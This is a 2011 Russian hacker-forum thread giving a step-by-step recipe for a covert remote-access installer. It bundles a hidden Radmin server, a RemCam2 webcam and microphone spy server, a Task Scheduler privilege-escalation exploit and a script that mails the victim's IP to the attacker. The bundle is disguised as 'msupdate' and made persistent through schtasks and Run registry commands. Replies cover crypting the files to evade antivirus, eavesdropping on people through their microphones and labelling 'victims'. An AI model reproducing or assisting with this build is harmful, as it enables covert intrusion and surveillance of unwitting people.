1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Скрытый Radmin + RemCam2 + ip на почту

Тема в разделе "Самое важное", создана пользователем крах, 30 янв 2011.

  1. крах
    крах Новичок
    Симпатии:
    16
    Это моя первая тема, так что если что не так - сильно не ругайте,пишите исправим :)

    Прежде всего хочу поблагодарить и сказать большое спасибо onthar и Iindigo за помощь в моих начинаниях...

    Эта тема по сути сборка Iindigo http://www.xaker.name/forvb/showthread.php?t=19713 я в свою очередь только добавил RemCam2 (программа для передачи изображения с Веб Камеры и звука по сети) и внес некоторые изменения с отсылкой ip на почту...

    И так,для сборки нам понадобятся:

    • msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы)
    • архив для отправки на email
    • сплойт Windows Task Scheduler Privilege Escalation
    • пакет утилит Radmin Deployment tool
    • программа Bat to Exe Converter
    • архиватор WinRar
    • сервер RemCam2

    Весь архив по ссылке:http://depositfiles.com/files/ad1h8m6ay

    Далее устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя admin, пароль 123456 и сохранил пакет под именем msupdate.msi

    Cсылка на видео по настройке (от Iindigo) http://www.youtube.com/watch?v=hQm5S75GeYM

    Откладываем этот пакет в сторонку,открываем папку ip и начинаем настройку почтового клиента:

    ip.bat

    Настраиваем под себя,если будут проблемы с отправкой можно поменять порт 25 на 587(у меня работает на 587)

    После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
    Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.

    Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe

    Cсылка на видео по настройке ip:http://www.youtube.com/watch?v=klAIxkpVB1U

    Откладываем готовый ip.exe к msupdate.msi.Теперь посмотрим на наш рабочий inst.cmd (есть готовый в скаченном вами архиве):

    Интервал отправки ip можно подправить здесь:
    schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f

    Пароль к RemCam2 здесь:
    1.reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
    2.start cam_server.exe pass=Пароль port=57011

    Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.

    Кладём этот файл в кучу к msupdate.msi, ip.exe,cam_server.exe и туда же добавляем наш сплойт - poc.exe.
    В итоге, у нас получилось 5 файлов:

    1. msupdate.msi - специальный пакет radmin server 3.4
    2. ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
    3. inst.exe - основной инсталлятор
    4. poc.exe - сплойт Windows Task Scheduler Privilege Escalation
    5. cam_server.exe-сервер RemCam2

    Все 5 файлов объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
    Вкладка "Общие":
    Путь для распаковки - вводим %temp%
    Выполнить после распаковки - вводим %temp%\inst.exe

    Вкладка "Режимы":
    Режим вывода информации - ставим в "Скрыть всё"

    Вкладка "Обновление":
    Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
    Жмём "Ок" и ещё раз "Ок" для создания архива.
    Инсталлятор готов.

    Тестил несколько раз все работает,кому что не понятно обращайтесь.

    // копирование на другие ресурсы разрешено только с копирайтом и ссылкой на этот топик

    Сборка предоставляется исключительно для ознакомления.
    Использование данной сборки влечет за собой ответственность согласно действующему законодательству.
     
    Последнее редактирование: 15 фев 2011
    30 янв 2011
    5 пользователям это понравилось.
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    семерка х64 орет на эти параметры, позже покурю справку, погляжу, как правильно для нее параметр задается.

    upd.
    А телнет зачем? Есть в радмине командная строка.
    Кстати ошибку у меня выдало, что не найден файл ip.exe по адресу TEMP.
    Дорабатывай, меньше копипаста - больше собственных усилий.

    upd2.
    В общем ищи ошибки, совет - почисти временные файлы, потом тестируй, потому что твой вариант не запустится при настройках, которые указаны в видео.
    Так же убери красный цвет - это запрещено правилами форума, и клянчить "плюсики" - не комильфо.
     
    31 янв 2011
  3. крах
    крах Новичок
    Симпатии:
    16
    Только что все перепроверил.Создал новую ОС на виртуальной машине..Никаких проблем с установкой не наблюдается.Все работает отлично.
     
    31 янв 2011
  4. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    это не может отлично работать только по тому, что конвертер дропает не в temp, а в подпапку.
     
    31 янв 2011
  5. крах
    крах Новичок
    Симпатии:
    16
    Кстати в сборке от индиго,когда я поменял "copy /y "ip.exe" "%SYSTEMROOT%/ip.exe" именно на copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe" ,только потом все заработало...Я знаю ты мне уже говорил об этом в соседнем посте,но у меня с таким параметром работает...а с тем не работало

    Добавлено через 8 минут
    Выдержка из соседнего поста от индигио от 7 января 2011
     
    Последнее редактирование: 31 янв 2011
    31 янв 2011
  6. Rebel
    Rebel Новичок
    Симпатии:
    0
    крах, а что как рем кам звук нормально передает с компа прям все хорошо слышно что говорят люди если там есть микрофон?? ))))
     
    31 янв 2011
  7. крах
    крах Новичок
    Симпатии:
    16
    Нормально все слышно,как по скайпу общаешься также...
     
    31 янв 2011
  8. aigera
    aigera Новичок
    Симпатии:
    5
    Если уже стоит радмин. То просто ставим в автозагрузку cam_server.exe и все????
     
    1 фев 2011
  9. крах
    крах Новичок
    Симпатии:
    16
    Ты можешь воспользоваться телнетом,залить через фтп сервер,запустить удаленно как на видео :

    http://www.youtube.com/watch?v=WPOamXV6vUs
     
    1 фев 2011
  10. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Ну, в общем да.
     
    2 фев 2011
  11. adm1nb3k
    adm1nb3k Новичок
    Симпатии:
    0
    А если комп находиться с сети, через хаб? IP для всей сети 1 будет же? Правильно я так понимаю..
     
    4 фев 2011
  12. крах
    крах Новичок
    Симпатии:
    16
    6 фев 2011
    1 человеку нравится это.
  13. крах
    крах Новичок
    Симпатии:
    16
    Криптанутый poc.exe : http://www.multiupload.com/GG55BN7JQM

    Будут вопросы обращайся
     
    7 фев 2011
  14. maxxl79
    maxxl79 Новичок
    Симпатии:
    0
    Извините, первый раз тренируюсь в хаке, по статье:
    файервол семерки просит разрешения на cam_server, poc.exe (и сам криптовал,и ваш тоже) криптованый палится виндозовским антивирем. ip.bat при копировании просит перезапись, на второй машине профиль под паролем, не стартует cam_server. короче надо мне учить матчасть, что посоветуете?
     
    13 фев 2011
  15. крах
    крах Новичок
    Симпатии:
    16
    Криптанул poc.exe, ip.exe, cam_server.exe этим http://www.xaker.name/forvb/showthread.php?t=12587&page=23 криптором

    Скрытый Radmin + RemCam2 + ip на почту

    резултат проверки :

     
    Последнее редактирование: 16 фев 2011
    16 фев 2011
  16. aigera
    aigera Новичок
    Симпатии:
    5
    все равно палиться антивиром
     
    19 фев 2011
  17. Flasher
    Flasher Новичок
    Симпатии:
    0
    крах, благодарю! Всё понятно описано, а главное работает.
     
    25 фев 2011
  18. adm1nb3k
    adm1nb3k Новичок
    Симпатии:
    0
    Я бы к ip.bat добавил бы еще и имя компьютера, что бы не путать жертв.
     
    12 мар 2011
  19. крах
    крах Новичок
    Симпатии:
    16
    Знающие люди поиогите плиз как нужно прописать здесь в батнике чтобы ip приходило после подключения или после смены ip ???

    schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f

    - с этим слишком много мусора копится...

    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%\ip.exe

    с этим не хочет...
     
    Последнее редактирование: 25 мар 2011
    25 мар 2011
  20. bozi
    bozi Новичок
    Симпатии:
    0
    27 апр 2011

Поделиться этой страницей

Загрузка...